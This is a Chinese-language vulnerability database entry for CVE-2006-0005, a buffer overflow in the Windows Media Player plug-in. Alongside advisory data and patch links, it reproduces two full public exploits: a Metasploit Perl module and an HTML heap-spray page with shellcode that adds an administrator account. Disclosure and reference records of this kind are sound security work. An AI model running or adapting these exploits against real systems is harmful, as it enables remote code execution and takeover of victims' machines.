CVE-2006-0005
CVSS9.3
发布时间 :2006-02-14 14:06:00
修订时间 :2011-03-07 21:29:09
NMCOES    

[原文]Buffer overflow in the plug-in for Microsoft Windows Media Player (WMP) 9 and 10, when used in browsers other than Internet Explorer and set as the default application to handle media files, allows remote attackers to execute arbitrary code via HTML with an EMBED element containing a long src attribute.


[CNNVD]Microsoft Windows Media Player插件缓冲区溢出漏洞(CNNVD-200602-192)

        Microsoft Windows Media Player是一款非常流行的媒体播放器。
        Windows Media layer(WMP)可在流行的浏览器中作为插件启动以便用户浏览网页上的Windows Media Player文件类型。
        Microsoft Windows Media Player插件实现上存在缓冲区溢出漏洞,在某些环境下,远程攻击者可能利用此漏洞在用户机器上执行任意指令。一些非IE的浏览器(如FireFox和Netscape)中,Windows Media Player插件中的漏洞可以被触发,IE及Opera浏览器不受此漏洞影响。如果上述浏览器浏览嵌入了超长src标签的恶意HTML页面并启动WMP插件的话,可以覆盖SEH地址导致在系统中执行任意指令。具体来说,漏洞存在于npdsplay.10001040,在这里用户提供的字符串被拷贝到了栈缓冲区中:
         1000171A C1E9 02 SHR ECX,2
        >> 1000171D F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
         1000171F 8BC8 MOV ECX,EAX

- CVSS (基础分值)

CVSS分值: 9.3 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_xp:::x64Microsoft Windows XP 64-bit
cpe:/o:microsoft:windows_server_2003:web_edition_sp1
cpe:/o:microsoft:windows-nt:datacenter_server:sp3
cpe:/o:microsoft:windows_2000_advanced_server:sp3
cpe:/o:microsoft:windows_2000::sp3:pro
cpe:/o:microsoft:windows_xp::sp2:pro
cpe:/o:microsoft:windows_2000_advanced_server:sp1
cpe:/o:microsoft:windows_2003_server:datacenter_edition
cpe:/o:microsoft:windows_2003_server:enterprise_edition
cpe:/o:microsoft:windows_server_2000:sp1
cpe:/o:microsoft:windows_2000::sp2:pro
cpe:/o:microsoft:windows_server_2003:standard_sp1
cpe:/o:microsoft:windows_xp:::pro
cpe:/o:microsoft:windows_2003_server:standard_64-bit
cpe:/o:microsoft:windows_2003_server:standard
cpe:/o:microsoft:windows_2000::sp4:serverMicrosoft Windows 2000 Server SP4
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows-nt:xp_tablet_pc:sp1
cpe:/o:microsoft:windows_server_2003:enterprise_sp1
cpe:/o:microsoft:windows_2000::sp4:pro
cpe:/o:microsoft:windows_server_2000:none
cpe:/o:microsoft:windows_2003_server:datacenter_edition_64-bit
cpe:/o:microsoft:windows_server_2003:datacenter_sp1
cpe:/o:microsoft:windows-nt:xp:sp2:home
cpe:/o:microsoft:windows-nt:datacenter_server:sp2
cpe:/o:microsoft:windows_xp:::media_center
cpe:/o:microsoft:windows-nt:xp
cpe:/o:microsoft:windows-nt:xp_tablet_pc:sp2
cpe:/o:microsoft:windows-nt:datacenter_server:sp4
cpe:/o:microsoft:windows_server_2000:sp3
cpe:/o:microsoft:windows_xp:::home
cpe:/o:microsoft:windows-nt:2000
cpe:/o:microsoft:windows_xp::sp1:pro
cpe:/o:microsoft:windows_2000_advanced_server:sp2
cpe:/o:microsoft:windows_2000_advanced_server
cpe:/o:microsoft:windows_xp::sp2:media_centerMicrosoft windows xp_sp2 media_center
cpe:/o:microsoft:windows_2003_server:enterprise_edition_64-bit
cpe:/o:microsoft:windows_2000::sp1:pro
cpe:/o:microsoft:windows-nt:xp_tablet_pc
cpe:/o:microsoft:windows-nt:datacenter_server:sp1
cpe:/o:microsoft:windows_2000_advanced_server:sp4
cpe:/o:microsoft:windows_2003_server:web_edition
cpe:/o:microsoft:windows-nt:datacenter_server
cpe:/o:microsoft:windows_xp::sp1:media_centerMicrosoft windows xp_sp1 media_center
cpe:/o:microsoft:windows_server_2000:sp2

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1559Windows Media Player Plug-in EMBED Vulnerability
oval:gov.nist.fdcc.patch:def:293MS06-006: Vulnerability in Windows Media Player Plug-in with Non-Microsoft Internet Browsers Could Allow Remote Code Execution (911564)
oval:gov.nist.USGCB.patch:def:293MS06-006: Vulnerability in Windows Media Player Plug-in with Non-Microsoft Internet Browsers Could Allow Remote Code Execution (911564)
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0005
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0005
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-192
(官方数据源) CNNVD

- 其它链接及资源

http://www.us-cert.gov/cas/techalerts/TA06-045A.html
(UNKNOWN)  CERT  TA06-045A
http://www.kb.cert.org/vuls/id/692060
(UNKNOWN)  CERT-VN  VU#692060
http://xforce.iss.net/xforce/xfdb/24493
(UNKNOWN)  XF  win-mediaplayer-plugin-embed-bo(24493)
http://www.vupen.com/english/advisories/2006/0575
(UNKNOWN)  VUPEN  ADV-2006-0575
http://www.securityfocus.com/bid/16644
(UNKNOWN)  BID  16644
http://www.microsoft.com/technet/security/bulletin/ms06-006.mspx
(UNKNOWN)  MS  MS06-006
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=393
(UNKNOWN)  IDEFENSE  20060214 Microsoft Windows Media Player Plugin Buffer Overflow Vulnerability
http://securitytracker.com/id?1015628
(UNKNOWN)  SECTRACK  1015628
http://secunia.com/advisories/18852
(VENDOR_ADVISORY)  SECUNIA  18852

- 漏洞信息

Microsoft Windows Media Player插件缓冲区溢出漏洞
高危 缓冲区溢出
2006-02-14 00:00:00 2006-02-21 00:00:00
远程  
        Microsoft Windows Media Player是一款非常流行的媒体播放器。
        Windows Media layer(WMP)可在流行的浏览器中作为插件启动以便用户浏览网页上的Windows Media Player文件类型。
        Microsoft Windows Media Player插件实现上存在缓冲区溢出漏洞,在某些环境下,远程攻击者可能利用此漏洞在用户机器上执行任意指令。一些非IE的浏览器(如FireFox和Netscape)中,Windows Media Player插件中的漏洞可以被触发,IE及Opera浏览器不受此漏洞影响。如果上述浏览器浏览嵌入了超长src标签的恶意HTML页面并启动WMP插件的话,可以覆盖SEH地址导致在系统中执行任意指令。具体来说,漏洞存在于npdsplay.10001040,在这里用户提供的字符串被拷贝到了栈缓冲区中:
         1000171A C1E9 02 SHR ECX,2
        >> 1000171D F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
         1000171F 8BC8 MOV ECX,EAX

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.microsoft.com/technet/security/Bulletin/MS06-006.mspx

- 漏洞信息 (1504)

MS Windows Media Player 9 Plugin Overflow Exploit (MS06-006) (meta) (EDBID:1504)
windows remote
2006-02-17 Verified
0 H D Moore
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::wmp_plugin_ms06_006;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;

 my $advanced =
  {
	'Gzip'       => [1, 'Enable gzip content encoding'],
	'Chunked'    => [1, 'Enable chunked transfer encoding'],
  };

my $info =
  {
	'Name'           => 'Windows Media Player Plugin MS06-006 Overflow',
	'Version'        => '$Revision: 1.1 $',
	'Authors'        =>
	  [
		'H D Moore <hdm [at] metasploit.com',
	  ],

	'Description'    =>
	  Pex::Text::Freeform(qq{
		This module exploits a vulnerability in the Windows Media Player plugin
		for non-Microsoft web browsers. This module has been tested with Windows
		Media Player 9 on Windows 2000 SP4, Windows XP SP2, and Windows 2003 SP0
		(Firefox 1.5 and Opera 8.5).
}),

	'Arch'           => [ 'x86' ],
	'OS'             => [ 'win32', 'winxp', 'win2003' ],
	'Priv'           => 0,

	'AutoOpts'       => { 'EXITFUNC' => 'process', 'GETPCTYPE' => 'ecx' },
	'UserOpts'       =>
	  {
		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
	  	'REALHOST' => [ 0, 'HOST', 'External address to use for redirects (NAT)' ],
	  },

	'Payload'        =>
	  {
		# give some stack space, align esp
		'Space'     => 1024,
		'BadChars'  => "\x00\x22".join('', map { $_=chr($_) } (0x80 .. 0xff)),
		'MinNops'   => 0,
		'MaxNops'   => 0,
	  },
	'Refs'           =>
	  [
	  	['CVE', '2006-0005'],
	  	['OSVDB', '23132'],
		['MSB', 'MS06-006'],
		['BID', '15130'],
	  ],

	'DefaultTarget'  => 0,
	'Targets'        =>
	  [
		[ 'Automatic - WMP 9.0', 0x07694b1e ]
	  ],

	'Keys'           => [ 'wmp' ],

	'DisclosureDate' => 'Feb 14 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit
{
	my $self = shift;
	my $server = IO::Socket::INET->new(
		LocalHost => $self->GetVar('HTTPHOST'),
		LocalPort => $self->GetVar('HTTPPORT'),
		ReuseAddr => 1,
		Listen    => 1,
		Proto     => 'tcp'
	  );
	my $client;

	# Did the listener create fail?
	if (not defined($server)) {
		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
		return;
	}

	my $httphost = $self->GetVar('HTTPHOST');
	$httphost = Pex::Utils::SourceIP('1.2.3.4') if $httphost eq '0.0.0.0';

	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");

	while (defined($client = $server->accept())) {
		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
	}

	return;
}

sub HandleHttpClient
{
	my $self = shift;
	my $fd   = shift;

	# Set the remote host information
	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
		

	# Read the HTTP command
	my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
	my $agent;
	
	# Read in the HTTP headers
	while ((my $line = $fd->RecvLine(10))) {
		
		$line =~ s/^\s+|\s+$//g;
		
		my ($var, $val) = split(/\:/, $line, 2);

		# Break out if we reach the end of the headers
		last if (not defined($var) or not defined($val));

		$agent = $val if $var =~ /User-Agent/i;
	}


	my $addr;

	##
	# XXX Does not detect Windows SP levels or WMP version :-(
	##

	# Windows NT and Windows 2000 systems
	if ($agent =~ /Windows NT [45]\.0/) {
		$self->PrintLine("[*] Targetting WMP v9 on NT/2000...");
		$addr = 0x07694b1e; # wmp.dll v9.00.00.2980
	}

	# Windows XP SP2
	if ($agent =~ /Windows NT 5\.1/) {
		$self->PrintLine("[*] Targetting WMP v9 on XP SP2...");	
		$addr = 0x4b5d5c74; # wmp.dll v9.00.00.3250
	}
	
	# Windows 2003 SP0
	if ($agent =~ /Windows NT 5\.2/) {
		$self->PrintLine("[*] Targetting WMP v9 on 2003 SP0...");	
		$addr = 0x585a6052; # wmp.dll v9.00.00.2991
	}	
	

	my $target    = $self->Targets->[$self->GetVar('TARGET')];
	my $shellcode = $self->GetVar('EncodedPayload')->Payload;
	my $pattern   = "C" x 4000;

	$addr = $target->[1] if ! $addr;
	
	# We can't use SEH getpc from inside a SEH handler on XP SP2 >:(
	# So we do it like a drunk ninja.
	my $getpc = 
		"\x58\x58\x58".         # pop eax, pop eax, pop eax
		"\x05\x18\x29\x29\x29". # add eax,0x29292917
		"\x2d\x01\x29\x29\x29". # sub eax,0x29292901
		"\x50\x59";             # push eax, pop ecx

	substr($pattern, 2082, 4, "ABC=");       # inc, inc, inc, cmp eax, [ptr]	
	substr($pattern, 2086, 4, pack('V', $addr));
	substr($pattern, 2090, length($getpc), $getpc);
	substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);

	my $content   = "<html><body><embed type=\"application/x-mplayer2\" src=\"$pattern.wmv\"></body></html>";

	$self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload...");

	$fd->Send($self->BuildResponse($content));

	# Prevents IE from throwing an error in some cases
	select(undef, undef, undef, 0.1);

	$fd->Close();
}

sub RandomHeaders {
	my $self = shift;
	my $head = '';

	while (length($head) < 3072) {
		$head .= "X-" .
		  Pex::Text::AlphaNumText(int(rand(30) + 5)) . ': ' .
		  Pex::Text::AlphaNumText(int(rand(256) + 5))  ."\r\n";
	}
	return $head;
}


sub BuildResponse {
	my ($self, $content) = @_;

	my $response =
	  "HTTP/1.1 200 OK\r\n" .
	  $self->RandomHeaders() .
	  "Content-Type: text/html\r\n";

	if ($self->GetVar('Gzip')) {
		$response .= "Content-Encoding: gzip\r\n";
		$content = $self->Gzip($content);
	}
	if ($self->GetVar('Chunked')) {
		$response .= "Transfer-Encoding: chunked\r\n";
		$content = $self->Chunk($content);
	} else {
		$response .= 'Content-Length: ' . length($content) . "\r\n" .
		  "Connection: close\r\n";
	}

	$response .= "\r\n" . $content;

	return $response;
}

sub Chunk {
	my ($self, $content) = @_;

	my $chunked;
	while (length($content)) {
		my $chunk = substr($content, 0, int(rand(10) + 1), '');
		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
	}
	$chunked .= "0\r\n\r\n";

	return $chunked;
}

sub Gzip {
	my $self = shift;
	my $data = shift;
	my $comp = int(rand(5))+5;

	my($wtr, $rdr, $err);

	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
	print $wtr $data;
	close ($wtr);
	local $/;

	return (<$rdr>);
}

1;

# milw0rm.com [2006-02-17]
		

- 漏洞信息 (1505)

MS Windows Media Player 10 Plugin Overflow Exploit (MS06-006) (EDBID:1505)
windows remote
2006-02-17 Verified
0 Matthew Murphy
N/A [点击下载]
<HTML>
<HEAD>
<TITLE>WMP Plugin EMBED Exploit</TITLE>
<SCRIPT>
// Windows Media Player Plug-In EMBED Overflow Universal Exploit (MS06-006)
// By Matthew Murphy (mattmurphy@kc.rr.com)
//
// DISCLAIMER:
//
// This exploit code is intended only as a demonstration tool for
// educational or testing purposes. It is not intended to be used for any
// unauthorized or illicit purpose. Any testing done with this tool must
// be limited to systems that you own or are explicitly authorized to
// test.
//
// By utilizing or possessing this code, you assume any and all
// responsibility for damage that results. The author will not be held
// responsible, under any circumstances, for damage that arises from your
// possession or use of this code.
//
// Tested: 
// Firefox 1.5.0.1
// Windows Media Player 10
// Windows XP SP2 (US)
//
// The Windows Media Player plug-in for non-Microsoft browsers (Firefox,
// Opera, etc.) suffers from an exploitable overflow in its handling of
// EMBED tags. Specifically, a very long SRC property on such a tag can
// lead to an overflow that will corrupt a structured exception handling
// frame.
//
// The SEH frame is the vector of control that I exploit. Fortunately,
// DEP is turned off for non-Microsoft code, so there's no issue there.
// That's really a shame, because such a move would've made an already
// difficult exploit much harder.
//
// One of the reasons the exploit is tough is because the overrun buffer
// (the SRC attribute) is seriously mangled before it is handled by the
// plug-in. In particular, any character with the sign bit set (> 0x7F)
// is replaced.
//
// We could do as the creative wizards like HD Moore suggest and use an
// alphanumeric payload with some cute SEH tricks. Let me rephrase:
// YOU could do as the creative wizards suggest. Meanwhile, I'm perfectly 
// content to throw my code in another buffer and get around all the silly 
// alpha-numeric sanitation. Sure beats devoting hours to beating it
// with fancy shellcode, all for a PoC I may never release.
//
// Instead, I shamelessly ripped a page from Skylined's book and borrowed
// (and cleaned up) the heap spraying technique. My heap-spray is a lot
// less precise, because the memory layout is a lot more variable. In
// my experience, it took a _HUGE_ block allocation to get the heap I 
// wanted to jump to into a reliably-placed location. Hence the atrocity
// of the 16MB of noops below.
//
// Aside from the character restrictions, this is a standard stack-based
// overflow. I simply smash the SEH frame with a pointer to my HUGE heap
// block, which consists of a bunch of 0x41 characters. An INC ECX is a
// functional noop -- so the box takes the slide down the heap into the
// shellcode. The shellcode is a standard Win32 "add administrator" 
// payload from Metasploit.
//
// This exploit is a lot of ripping, cleaning and re-implementation, but
// that just goes to show how easy it is to write. So... how about that 
// 'Important' rating? A bit perplexing to rate a "click-and-own" as an
// Important... or is it just because nobody would *DARE* run one of those
// "Non-Microsoft" browsers on Windows? :-)

// Spray the heap
var spray = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
do {
spray += spray;
} while (spray.length < 0x1000000);

// If this is successful, you can login as a local admin:
//
// User: wmp0wn3d
// Pass: password

spray += unescape(
"%uc933%ue983%ud9c9%ud9ee%u2474%u5bf4%u7381%u9713"+
"%u798c%u839b%ufceb%uf4e2%u646b%u9b3d%u8c97%udef2"+
"%u07ab%u9e05%u8def%u1096%u94d8%uc4f2%u8db7%ud292"+
"%ub81c%u9af2%ubd79%u02b9%u083b%uefb9%u4d90%u96b3"+
"%u4e96%u6f92%ud8ac%u9f5d%u69e2%uc4f2%u8db3%ufd92"+
"%u801c%u1032%u90c8%u7078%u901c%u9af2%u057c%ubf25"+
"%u4f93%u5b48%u07f3%uab39%u4c12%u9701%ucc1c%u1075"+
"%u90e7%u10d4%u84ff%u9292%u0c1c%u9bc9%u8c97%uf3f2"+
"%ud3ab%u6d48%udaf7%u63f0%u4c14%ucb02%u7cff%u9ff3"+
"%ue4c8%u65e1%u821d%u642e%uef70%uff14%ue9b9%ufe01"+
"%ua3b7%ubb1a%ue9f9%ubb0d%uffe2%ue91c%ufbb7%ueb14"+
"%ufba7%ua817%uacf3%ufa09%uffe4%uf40e%ue8e5%ub459"+
"%uc8d6%ubb3d%uaab1%uf559%uf8f2%uf759%ueff8%uf718"+
"%ufef0%uee16%uace7%uff38%ue5fa%uf217%uf8e4%ufa0b"+
"%ue3e3%ue80b%ufbb7%ueb14%ufba7%ua817%uacf3%uda56"+
"%uc8d3%u9b79"
);
</SCRIPT>
</HEAD>
<BODY>
<EMBED SRC="----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv"></EMBED>
</BODY>
</HTML>

# milw0rm.com [2006-02-17]
		

- 漏洞信息

23132
Microsoft Windows Media Player Plug-in Malformed EMBED Element Arbitrary Code Execution
Remote / Network Access, Context Dependent
Loss of Integrity Workaround, Patch / RCS
Exploit Public Vendor Verified, Coordinated Disclosure

- 漏洞描述

- 时间线

2006-02-14 Unknow
2006-02-17 2006-02-14

- 解决方案

Microsoft has released a patch to address this vulnerability. Additionally, it is possible to temporarily work around the flaw by implementing the following workaround: Do not set Windows Media Player as the default application to launch media files.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft Windows Media Player Plugin Buffer Overflow Vulnerability
Boundary Condition Error 16644
Yes No
2006-02-14 12:00:00 2007-05-15 08:48:00
John Cobb of iDEFENSE is credited with the discovery of this vulnerability. This issue was disclosed in the referenced vendor advisory.

- 受影响的程序版本

Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 0
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server

- 漏洞讨论

The Microsoft Windows Media Player plugin for non-Microsoft browsers is prone to a buffer-overflow vulnerability. The application fails to do proper boundary checks on user-supplied data before using it in a finite-sized buffer.

An attacker can exploit this issue to execute arbitrary code on the victim user's computer in the context of the victim user. This may facilitate a compromise of the affected computer.

This issue is exploitable only through non-Microsoft browsers that have the Media Player plugin installed. Possible browsers include Firefox .9 and later and Netscape 8; other browsers with the plugin installed may also be affected.

- 漏洞利用

UPDATE (May 15, 2007): This issue is being exploited by the MPack hacker tool. Please see the references for more information.

NOTE: Mozilla Firefox and Opera Browser (and possibly other browsers) are a valid attack vector for this issue.

The following exploits are available:

- 解决方案

Microsoft has released security advisory MS06-006 with updates to address this issue.


Microsoft Windows Server 2003 Datacenter Edition SP1

Microsoft Windows Server 2003 Datacenter x64 Edition

Microsoft Windows Server 2003 Enterprise Edition SP1

Microsoft Windows XP Media Center Edition SP2

Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows XP Tablet PC Edition SP1

Microsoft Windows Server 2003 Enterprise Edition

Microsoft Windows XP Home SP2

Microsoft Windows 2000 Datacenter Server SP4

Microsoft Windows XP Tablet PC Edition SP2

Microsoft Windows XP Media Center Edition SP1

Microsoft Windows Server 2003 Web Edition

Microsoft Windows XP Home

Microsoft Windows XP Home SP1

Microsoft Windows XP Professional x64 Edition

Microsoft Windows XP Media Center Edition

Microsoft Windows Server 2003 Web Edition SP1

Microsoft Windows Server 2003 Standard Edition SP1

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows XP Professional SP2

Microsoft Windows Server 2003 Standard x64 Edition

Microsoft Windows 2000 Server SP4

Microsoft Windows XP Professional

Microsoft Windows Server 2003 Enterprise x64 Edition

Microsoft Windows 2000 Professional SP4

Microsoft Windows XP Tablet PC Edition

Microsoft Windows XP Professional SP1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站